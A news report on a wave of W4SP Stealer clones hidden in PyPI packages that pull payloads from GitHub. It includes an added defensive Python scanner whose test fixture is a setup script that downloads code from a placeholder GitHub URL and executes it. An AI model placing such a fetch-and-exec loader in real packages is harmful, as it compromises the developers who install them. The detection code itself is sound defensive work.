Hackers bombard PyPI platform with information-stealing malware
2022-12-20 18:42

The PyPI Python package repository is being bombarded by a wave of information-stealing malware hidden inside malicious packages uploaded to the platform to steal software developers' data.

The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.

An additional 31 packages dropping 'W4SP' have been removed from the PyPI repository, with the malware's operators continuing to seek new ways to reintroduce their malware on the platform.

Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload. The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.

Following the same tactics as the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload. It is unclear whether these malware "clones" are operated by the same threat actors behind W4SP or by copycats, but Phylum hypothesizes that they come from different groups attempting to mimic previous campaigns.
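A static triage check for the tactic described above, as an added example that is not from Phylum or the original article: it parses a package's Python source without running it and flags files that both reference GitHub-hosted content and call a dynamic-execution function. The host list, the set of call names, and both sample files are assumptions constructed for illustration.

```python
import ast

# Assumption: hosts a package could use to pull content from a GitHub repository.
GITHUB_HOSTS = ("raw.githubusercontent.com", "gist.githubusercontent.com", "github.com")
# Assumption: trailing call names that can run downloaded content.
EXEC_CALLS = {"exec", "eval", "system", "popen", "Popen"}

# Constructed sample: install script that fetches remote content and executes it.
SAMPLE_FLAGGED = '''
from urllib.request import urlopen
from setuptools import setup
code = urlopen("https://raw.githubusercontent.com/EXAMPLE-USER/EXAMPLE-REPO/main/x.py").read()
exec(code)
setup(name="example-package", version="0.0.1")
'''
# Constructed sample: GitHub appears only as project metadata, nothing is executed.
SAMPLE_BENIGN = '''
from setuptools import setup
setup(name="example-package", url="https://github.com/EXAMPLE-USER/EXAMPLE-REPO")
'''


def call_name(node):
    """Return the trailing name of a call target, e.g. exec(...) or os.system(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_source(source, filename="<package file>"):
    """Return (urls, execs): (line, text) pairs for GitHub URLs and exec-style calls."""
    urls, execs = [], []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(host in node.value for host in GITHUB_HOSTS):
                urls.append((node.lineno, node.value))
        elif isinstance(node, ast.Call) and call_name(node) in EXEC_CALLS:
            execs.append((node.lineno, call_name(node)))
    return sorted(urls), sorted(execs)


def is_suspicious(source):
    """Flag only when a GitHub reference and dynamic execution occur in the same file."""
    urls, execs = scan_source(source)
    return bool(urls and execs)
```

A hit is a reason to review the file by hand, not a verdict: a GitHub URL alone is normal package metadata, and obfuscated strings will evade a literal host match.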

Hackers have been increasingly targeting open-source package repositories, as compromising developers' systems offers an opportunity for even larger attacks.


News URL

https://www.bleepingcomputer.com/news/security/hackers-bombard-pypi-platform-with-information-stealing-malware/

Related vendor

| VENDOR | LAST 12M | #/PRODUCTS | LOW | MEDIUM | HIGH | CRITICAL | TOTAL VULNS |
|---|---|---|---|---|---|---|---|
| Pypi | | 15 | 0 | 0 | 1 | 15 | 16 |